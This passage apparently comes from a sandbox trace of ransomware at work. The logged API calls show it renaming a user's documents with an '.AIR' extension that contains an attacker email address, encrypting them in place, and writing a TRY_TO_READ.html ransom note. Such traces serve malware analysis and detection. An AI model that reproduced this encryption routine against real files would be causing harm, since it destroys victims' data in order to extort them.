ftLastAccessTime.dwLowDateTime=0xb149ca50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb149ca50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b17a8 [0167.274] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.274] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.274] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc", dwFileAttributes=0x80) returned 1 [0167.274] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc") returned 68 [0167.274] GetProcessHeap () returned 0x2e0000 [0167.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x336dd8 [0167.274] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc" [0167.275] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc.12781717671972518758.ex_parvis@aol.com.AIR" [0167.275] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\xg_p5frzefnma zu.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\xg_p5frzefnma zu.doc.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.277] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\XG_P5FRZEFnMa zU.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\xg_p5frzefnma zu.doc.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538 [0167.278] GetProcessHeap () returned 0x2e0000 [0167.278] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.278] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=59626) returned 1 [0167.278] SetFilePointer (in: hFile=0x538, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xe8ea [0167.278] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.278] GetProcessHeap () returned 0x2e0000 [0167.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.278] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.278] WriteFile (in: hFile=0x538, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.279] WriteFile (in: hFile=0x538, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.279] WriteFile (in: hFile=0x538, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.279] ReadFile (in: hFile=0x538, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xe8ea, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xe8ea, lpOverlapped=0x0) returned 1 [0167.280] SetFilePointer (in: hFile=0x538, lDistanceToMove=-59626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.280] WriteFile (in: hFile=0x538, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xe8ea, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xe8ea, lpOverlapped=0x0) returned 1 [0167.282] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.282] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.282] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods", dwFileAttributes=0x80) returned 1 [0167.283] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods") returned 63 [0167.283] GetProcessHeap () returned 0x2e0000 [0167.283] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3ac428 [0167.283] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods" [0167.283] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods.12781717671972518758.ex_parvis@aol.com.AIR" [0167.283] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\vkjli--yfkp.ods"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\vkjli--yfkp.ods.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.285] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\vkJLI--yfKP.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\vkjli--yfkp.ods.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538 [0167.285] GetProcessHeap () returned 0x2e0000 [0167.285] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.285] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=61890) returned 1 [0167.286] SetFilePointer (in: hFile=0x538, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xf1c2 [0167.286] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.286] GetProcessHeap () returned 0x2e0000 [0167.286] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.286] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.286] WriteFile (in: hFile=0x538, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.287] WriteFile (in: hFile=0x538, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.287] WriteFile (in: hFile=0x538, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.287] ReadFile (in: hFile=0x538, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xf1c2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xf1c2, lpOverlapped=0x0) returned 1 [0167.288] SetFilePointer (in: hFile=0x538, lDistanceToMove=-61890, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.288] WriteFile (in: hFile=0x538, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xf1c2, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xf1c2, lpOverlapped=0x0) returned 1 [0167.290] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.290] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.290] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods", dwFileAttributes=0x80) returned 1 [0167.293] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods") returned 62 [0167.293] GetProcessHeap () returned 0x2e0000 [0167.293] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe2) returned 0x3ac428 [0167.293] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods" [0167.293] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods.12781717671972518758.ex_parvis@aol.com.AIR" [0167.293] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\shdnqu7yro.ods"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\shdnqu7yro.ods.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.297] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\shDnqU7Yro.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\shdnqu7yro.ods.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538 [0167.297] GetProcessHeap () returned 0x2e0000 [0167.297] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.297] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=66611) returned 1 [0167.297] SetFilePointer (in: hFile=0x538, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10433 [0167.297] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.297] GetProcessHeap () returned 0x2e0000 [0167.297] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.298] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.298] WriteFile (in: hFile=0x538, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.298] WriteFile (in: hFile=0x538, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.299] WriteFile (in: hFile=0x538, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.299] ReadFile (in: hFile=0x538, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x10433, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x10433, lpOverlapped=0x0) returned 1 [0167.301] SetFilePointer (in: hFile=0x538, lDistanceToMove=-66611, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.301] WriteFile (in: hFile=0x538, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x10433, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x10433, lpOverlapped=0x0) returned 1 [0167.302] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.302] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.302] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx", dwFileAttributes=0x80) returned 1 [0167.302] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx") returned 71 [0167.303] GetProcessHeap () returned 0x2e0000 [0167.303] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x31f5f0 [0167.303] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx" [0167.303] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx.12781717671972518758.ex_parvis@aol.com.AIR" [0167.303] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\o_028nnqm t2h0kpxg.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\o_028nnqm t2h0kpxg.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.308] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\O_028nnQm T2H0Kpxg.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\o_028nnqm t2h0kpxg.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538 [0167.308] GetProcessHeap () returned 0x2e0000 [0167.308] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0167.308] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=7638) returned 1 [0167.308] SetFilePointer (in: hFile=0x538, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1dd6 [0167.308] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.308] GetProcessHeap () returned 0x2e0000 [0167.308] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.308] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.309] WriteFile (in: hFile=0x538, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.309] WriteFile (in: hFile=0x538, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.309] WriteFile (in: hFile=0x538, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.310] ReadFile (in: hFile=0x538, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x1dd6, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x1dd6, lpOverlapped=0x0) returned 1 [0167.310] SetFilePointer (in: hFile=0x538, lDistanceToMove=-7638, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.310] WriteFile (in: hFile=0x538, lpBuffer=0x3b41f0*, nNumberOfBytesToWrite=0x1dd6, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b41f0*, lpNumberOfBytesWritten=0x2acf9c8*=0x1dd6, lpOverlapped=0x0) returned 1 [0167.311] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d4fc30, ftCreationTime.dwHighDateTime=0x1d4d583, ftLastAccessTime.dwLowDateTime=0x59c3f640, ftLastAccessTime.dwHighDateTime=0x1d4cf38, ftLastWriteTime.dwLowDateTime=0x59c3f640, ftLastWriteTime.dwHighDateTime=0x1d4cf38, nFileSizeHigh=0x0, nFileSizeLow=0xe8ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XG_P5FRZEFnMa zU.doc", cAlternateFileName="XG_P5F~1.DOC")) returned 0xffffffff [0167.311] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d4fc30, ftCreationTime.dwHighDateTime=0x1d4d583, ftLastAccessTime.dwLowDateTime=0x59c3f640, ftLastAccessTime.dwHighDateTime=0x1d4cf38, ftLastWriteTime.dwLowDateTime=0x59c3f640, ftLastWriteTime.dwHighDateTime=0x1d4cf38, nFileSizeHigh=0x0, nFileSizeLow=0xe8ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XG_P5FRZEFnMa zU.doc", cAlternateFileName="XG_P5F~1.DOC")) returned 0xffffffff [0167.311] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xb149ca50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb149ca50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b17e8 [0167.312] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c [0167.315] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.315] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.315] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", dwFileAttributes=0x80) returned 1 [0167.316] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 64 [0167.316] GetProcessHeap () returned 0x2e0000 [0167.316] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe6) returned 0x3ac428 [0167.316] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" [0167.316] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.12781717671972518758.ex_parvis@aol.com.AIR" [0167.316] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.319] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c [0167.319] GetProcessHeap () returned 0x2e0000 [0167.319] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, 